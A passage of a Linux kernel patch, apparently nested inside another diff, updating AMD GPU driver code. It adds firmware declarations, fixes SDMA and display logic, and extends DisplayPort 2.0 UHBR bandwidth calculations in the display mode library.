+--- a/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/mes_v11_0.c
+@@ -33,13 +33,20 @@
+ #include "mes_v11_api_def.h"
+ 
+ MODULE_FIRMWARE("amdgpu/gc_11_0_0_mes.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_0_mes_2.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_0_mes1.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_1_mes.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_1_mes_2.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_1_mes1.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_2_mes.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_2_mes_2.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_2_mes1.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_3_mes.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_3_mes_2.bin");
+ MODULE_FIRMWARE("amdgpu/gc_11_0_3_mes1.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_mes.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_mes_2.bin");
++MODULE_FIRMWARE("amdgpu/gc_11_0_4_mes1.bin");
+ 
+ static int mes_v11_0_hw_fini(void *handle);
+ static int mes_v11_0_kiq_hw_init(struct amdgpu_device *adev);
+diff --git a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+index 77d5a6f304094..5b251d0094678 100644
+--- a/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/sdma_v4_0.c
+@@ -1908,7 +1908,7 @@ static int sdma_v4_0_sw_fini(void *handle)
+ 			amdgpu_ring_fini(&adev->sdma.instance[i].page);
+ 	}
+ 
+-	if (adev->ip_versions[SDMA0_HWIP][0] == IP_VERSION(4, 2, 0) ||
++	if (adev->ip_versions[SDMA0_HWIP][0] == IP_VERSION(4, 2, 2) ||
+             adev->ip_versions[SDMA0_HWIP][0] == IP_VERSION(4, 4, 0))
+ 		amdgpu_sdma_destroy_inst_ctx(adev, true);
+ 	else
+diff --git a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+index 074e70a5c458e..e507d2e1410b7 100644
+--- a/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
++++ b/drivers/gpu/drm/amd/display/dc/bios/bios_parser2.c
+@@ -516,11 +516,8 @@ static enum bp_result get_gpio_i2c_info(
+ 	info->i2c_slave_address = record->i2c_slave_addr;
+ 
+ 	/* TODO: check how to get register offset for en, Y, etc. */
+-	info->gpio_info.clk_a_register_index =
+-			le16_to_cpu(
+-			header->gpio_pin[table_index].data_a_reg_index);
+-	info->gpio_info.clk_a_shift =
+-			header->gpio_pin[table_index].gpio_bitshift;
++	info->gpio_info.clk_a_register_index = le16_to_cpu(pin->data_a_reg_index);
++	info->gpio_info.clk_a_shift = pin->gpio_bitshift;
+ 
+ 	return BP_RESULT_OK;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
+index 0541e87e4f389..a461e9463534b 100644
+--- a/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
++++ b/drivers/gpu/drm/amd/display/dc/dc_dmub_srv.c
+@@ -764,7 +764,8 @@ void dc_dmub_setup_subvp_dmub_command(struct dc *dc,
+ 					!pipe->top_pipe && !pipe->prev_odm_pipe &&
+ 					pipe->stream->mall_stream_config.type == SUBVP_MAIN) {
+ 				populate_subvp_cmd_pipe_info(dc, context, &cmd, pipe, cmd_pipe_index++);
+-			} else if (pipe->plane_state && pipe->stream->mall_stream_config.type == SUBVP_NONE) {
++			} else if (pipe->plane_state && pipe->stream->mall_stream_config.type == SUBVP_NONE &&
++				    !pipe->top_pipe && !pipe->prev_odm_pipe) {
+ 				// Don't need to check for ActiveDRAMClockChangeMargin < 0, not valid in cases where
+ 				// we run through DML without calculating "natural" P-state support
+ 				populate_subvp_cmd_vblank_pipe_info(dc, context, &cmd, pipe, cmd_pipe_index++);
+diff --git a/drivers/gpu/drm/amd/display/dc/dce/dce_transform.c b/drivers/gpu/drm/amd/display/dc/dce/dce_transform.c
+index d9fd4ec60588f..670d5ab9d9984 100644
+--- a/drivers/gpu/drm/amd/display/dc/dce/dce_transform.c
++++ b/drivers/gpu/drm/amd/display/dc/dce/dce_transform.c
+@@ -1009,7 +1009,7 @@ static void dce_transform_set_pixel_storage_depth(
+ 		color_depth = COLOR_DEPTH_101010;
+ 		pixel_depth = 0;
+ 		expan_mode  = 1;
+-		BREAK_TO_DEBUGGER();
++		DC_LOG_DC("The pixel depth %d is not valid, set COLOR_DEPTH_101010 instead.", depth);
+ 		break;
+ 	}
+ 
+@@ -1023,8 +1023,7 @@ static void dce_transform_set_pixel_storage_depth(
+ 	if (!(xfm_dce->lb_pixel_depth_supported & depth)) {
+ 		/*we should use unsupported capabilities
+ 		 *  unless it is required by w/a*/
+-		DC_LOG_WARNING("%s: Capability not supported",
+-			__func__);
++		DC_LOG_DC("%s: Capability not supported", __func__);
+ 	}
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+index c20e9f76f0213..a1b312483d7f1 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn30/dcn30_hwseq.c
+@@ -629,7 +629,8 @@ void dcn30_init_hw(struct dc *dc)
+ 	if (dc->clk_mgr->funcs->notify_wm_ranges)
+ 		dc->clk_mgr->funcs->notify_wm_ranges(dc->clk_mgr);
+ 
+-	if (dc->clk_mgr->funcs->set_hard_max_memclk)
++	//if softmax is enabled then hardmax will be set by a different call
++	if (dc->clk_mgr->funcs->set_hard_max_memclk && !dc->clk_mgr->dc_mode_softmax_enabled)
+ 		dc->clk_mgr->funcs->set_hard_max_memclk(dc->clk_mgr);
+ 
+ 	if (dc->res_pool->hubbub->funcs->force_pstate_change_control)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hwseq.c
+index bdf101547484a..d4ee533deff32 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn31/dcn31_hwseq.c
+@@ -284,7 +284,7 @@ void dcn31_init_hw(struct dc *dc)
+ 	if (dc->clk_mgr->funcs->notify_wm_ranges)
+ 		dc->clk_mgr->funcs->notify_wm_ranges(dc->clk_mgr);
+ 
+-	if (dc->clk_mgr->funcs->set_hard_max_memclk)
++	if (dc->clk_mgr->funcs->set_hard_max_memclk && !dc->clk_mgr->dc_mode_softmax_enabled)
+ 		dc->clk_mgr->funcs->set_hard_max_memclk(dc->clk_mgr);
+ 
+ 	if (dc->res_pool->hubbub->funcs->force_pstate_change_control)
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+index e9188bce62e0b..2f4afe40f3e68 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn32/dcn32_hwseq.c
+@@ -970,7 +970,7 @@ void dcn32_init_hw(struct dc *dc)
+ 	if (dc->clk_mgr->funcs->notify_wm_ranges)
+ 		dc->clk_mgr->funcs->notify_wm_ranges(dc->clk_mgr);
+ 
+-	if (dc->clk_mgr->funcs->set_hard_max_memclk)
++	if (dc->clk_mgr->funcs->set_hard_max_memclk && !dc->clk_mgr->dc_mode_softmax_enabled)
+ 		dc->clk_mgr->funcs->set_hard_max_memclk(dc->clk_mgr);
+ 
+ 	if (dc->res_pool->hubbub->funcs->force_pstate_change_control)
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+index 49da8119b28e9..861f32b3248e7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn30/display_mode_vba_30.c
+@@ -4866,7 +4866,7 @@ void dml30_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->DETBufferSizeCThisState[k],
+ 							&v->UrgentBurstFactorCursorPre[k],
+ 							&v->UrgentBurstFactorLumaPre[k],
+-							&v->UrgentBurstFactorChroma[k],
++							&v->UrgentBurstFactorChromaPre[k],
+ 							&v->NoUrgentLatencyHidingPre[k]);
+ 				}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+index b612edb144172..cf8f3d690fa66 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn31/display_mode_vba_31.c
+@@ -4305,11 +4305,11 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->AudioSampleRate[k],
+ 							v->AudioSampleLayout[k],
+ 							v->ODMCombineEnablePerState[i][k]);
+-				} else if (v->Output[k] == dm_dp || v->Output[k] == dm_edp) {
++				} else if (v->Output[k] == dm_dp || v->Output[k] == dm_edp || v->Output[k] == dm_dp2p0) {
+ 					if (v->DSCEnable[k] == true) {
+ 						v->RequiresDSC[i][k] = true;
+ 						v->LinkDSCEnable = true;
+-						if (v->Output[k] == dm_dp) {
++						if (v->Output[k] == dm_dp || v->Output[k] == dm_dp2p0) {
+ 							v->RequiresFEC[i][k] = true;
+ 						} else {
+ 							v->RequiresFEC[i][k] = false;
+@@ -4317,107 +4317,201 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 					} else {
+ 						v->RequiresDSC[i][k] = false;
+ 						v->LinkDSCEnable = false;
+-						v->RequiresFEC[i][k] = false;
+-					}
+-
+-					v->Outbpp = BPP_INVALID;
+-					if (v->PHYCLKPerState[i] >= 270.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 2700,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 540.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 5400,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR2"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 810.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 8100,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR3"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[i] >= 10000.0 / 18) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 10000,
+-								4,
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						//v->OutputTypeAndRatePerState[i][k] = v->Output[k] & "10x4";
++						if (v->Output[k] == dm_dp2p0) {
++							v->RequiresFEC[i][k] = true;
++						} else {
++							v->RequiresFEC[i][k] = false;
++						}
+ 					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[i] >= 12000.0 / 18) {
+-						v->Outbpp = TruncToValidBPP(
+-								12000,
+-								4,
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						//v->OutputTypeAndRatePerState[i][k] = v->Output[k] & "12x4";
++					if (v->Output[k] == dm_dp2p0) {
++						v->Outbpp = BPP_INVALID;
++						if ((v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr10) &&
++							v->PHYCLKD18PerState[k] >= 10000.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 10000,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[k] < 13500.0 / 18.0 &&
++								v->DSCEnable[k] == true && v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 10000,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR10"
++						}
++						if (v->Outbpp == BPP_INVALID &&
++							(v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr13p5) &&
++							v->PHYCLKD18PerState[k] >= 13500.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 13500,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[k] < 20000.0 / 18.0 &&
++								v->DSCEnable[k] == true && v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 13500,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR13p5"
++						}
++						if (v->Outbpp == BPP_INVALID &&
++							(v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr20) &&
++							v->PHYCLKD18PerState[k] >= 20000.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 20000,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							if (v->Outbpp == BPP_INVALID && v->DSCEnable[k] == true &&
++								v->ForcedOutputLinkBPP[k] == 0) {
++								v->RequiresDSC[i][k] = true;
++								v->LinkDSCEnable = true;
++								v->Outbpp = TruncToValidBPP(
++										(1.0 - v->Downspreading / 100.0) * 20000,
++										v->OutputLinkDPLanes[k],
++										v->HTotal[k],
++										v->HActive[k],
++										v->PixelClockBackEnd[k],
++										v->ForcedOutputLinkBPP[k],
++										v->LinkDSCEnable,
++										v->Output[k],
++										v->OutputFormat[k],
++										v->DSCInputBitPerComponent[k],
++										v->NumberOfDSCSlices[k],
++										v->AudioSampleRate[k],
++										v->AudioSampleLayout[k],
++										v->ODMCombineEnablePerState[i][k]);
++							}
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " UHBR20"
++						}
++					} else {
++						v->Outbpp = BPP_INVALID;
++						if (v->PHYCLKPerState[i] >= 270.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 2700,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR"
++						}
++						if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 540.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 5400,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR2"
++						}
++						if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 810.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 8100,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
++									v->OutputFormat[k],
++									v->DSCInputBitPerComponent[k],
++									v->NumberOfDSCSlices[k],
++									v->AudioSampleRate[k],
++									v->AudioSampleLayout[k],
++									v->ODMCombineEnablePerState[i][k]);
++							v->OutputBppPerState[i][k] = v->Outbpp;
++							// TODO: Need some other way to handle this nonsense
++							// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR3"
++						}
+ 					}
+ 				}
+ 			} else {
+@@ -5095,7 +5189,7 @@ void dml31_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_l
+ 							v->DETBufferSizeCThisState[k],
+ 							&v->UrgentBurstFactorCursorPre[k],
+ 							&v->UrgentBurstFactorLumaPre[k],
+-							&v->UrgentBurstFactorChroma[k],
++							&v->UrgentBurstFactorChromaPre[k],
+ 							&v->NotUrgentLatencyHidingPre[k]);
+ 				}
+ 
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+index 4f91e64754239..bf77e56c3f3ef 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/dcn314_fpu.c
+@@ -310,6 +310,10 @@ int dcn314_populate_dml_pipes_from_context_fpu(struct dc *dc, struct dc_state *c
+ 				pipe->plane_state->src_rect.width < pipe->plane_state->dst_rect.width))
+ 			upscaled = true;
+ 
++		/* Apply HostVM policy - either based on hypervisor globally enabled, or rIOMMU active */
++		if (dc->debug.dml_hostvm_override == DML_HOSTVM_NO_OVERRIDE)
++			pipes[i].pipe.src.hostvm = dc->vm_pa_config.is_hvm_enabled || dc->res_pool->hubbub->riommu_active;
++
+ 		/*
+ 		 * Immediate flip can be set dynamically after enabling the plane.
+ 		 * We need to require support for immediate flip or underflow can be
+diff --git a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+index 3afd3c80e6da8..4998b211ccac7 100644
+--- a/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
++++ b/drivers/gpu/drm/amd/display/dc/dml/dcn314/display_mode_vba_314.c
+@@ -4403,11 +4403,11 @@ void dml314_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_
+ 							v->AudioSampleRate[k],
+ 							v->AudioSampleLayout[k],
+ 							v->ODMCombineEnablePerState[i][k]);
+-				} else if (v->Output[k] == dm_dp || v->Output[k] == dm_edp) {
++				} else if (v->Output[k] == dm_dp || v->Output[k] == dm_edp || v->Output[k] == dm_dp2p0) {
+ 					if (v->DSCEnable[k] == true) {
+ 						v->RequiresDSC[i][k] = true;
+ 						v->LinkDSCEnable = true;
+-						if (v->Output[k] == dm_dp) {
++						if (v->Output[k] == dm_dp || v->Output[k] == dm_dp2p0) {
+ 							v->RequiresFEC[i][k] = true;
+ 						} else {
+ 							v->RequiresFEC[i][k] = false;
+@@ -4415,107 +4415,201 @@ void dml314_ModeSupportAndSystemConfigurationFull(struct display_mode_lib *mode_
+ 					} else {
+ 						v->RequiresDSC[i][k] = false;
+ 						v->LinkDSCEnable = false;
+-						v->RequiresFEC[i][k] = false;
+-					}
+-
+-					v->Outbpp = BPP_INVALID;
+-					if (v->PHYCLKPerState[i] >= 270.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 2700,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 540.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 5400,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR2"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKPerState[i] >= 810.0) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 8100,
+-								v->OutputLinkDPLanes[k],
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						// TODO: Need some other way to handle this nonsense
+-						// v->OutputTypeAndRatePerState[i][k] = v->Output[k] & " HBR3"
+-					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[i] >= 10000.0 / 18) {
+-						v->Outbpp = TruncToValidBPP(
+-								(1.0 - v->Downspreading / 100.0) * 10000,
+-								4,
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						//v->OutputTypeAndRatePerState[i][k] = v->Output[k] & "10x4";
++						if (v->Output[k] == dm_dp2p0) {
++							v->RequiresFEC[i][k] = true;
++						} else {
++							v->RequiresFEC[i][k] = false;
++						}
+ 					}
+-					if (v->Outbpp == BPP_INVALID && v->PHYCLKD18PerState[i] >= 12000.0 / 18) {
+-						v->Outbpp = TruncToValidBPP(
+-								12000,
+-								4,
+-								v->HTotal[k],
+-								v->HActive[k],
+-								v->PixelClockBackEnd[k],
+-								v->ForcedOutputLinkBPP[k],
+-								v->LinkDSCEnable,
+-								v->Output[k],
+-								v->OutputFormat[k],
+-								v->DSCInputBitPerComponent[k],
+-								v->NumberOfDSCSlices[k],
+-								v->AudioSampleRate[k],
+-								v->AudioSampleLayout[k],
+-								v->ODMCombineEnablePerState[i][k]);
+-						v->OutputBppPerState[i][k] = v->Outbpp;
+-						//v->OutputTypeAndRatePerState[i][k] = v->Output[k] & "12x4";
++					if (v->Output[k] == dm_dp2p0) {
++						v->Outbpp = BPP_INVALID;
++						if ((v->OutputLinkDPRate[k] == dm_dp_rate_na || v->OutputLinkDPRate[k] == dm_dp_rate_uhbr10) &&
++							v->PHYCLKD18PerState[k] >= 10000.0 / 18.0) {
++							v->Outbpp = TruncToValidBPP(
++									(1.0 - v->Downspreading / 100.0) * 10000,
++									v->OutputLinkDPLanes[k],
++									v->HTotal[k],
++									v->HActive[k],
++									v->PixelClockBackEnd[k],
++									v->ForcedOutputLinkBPP[k],
++									v->LinkDSCEnable,
++									v->Output[k],
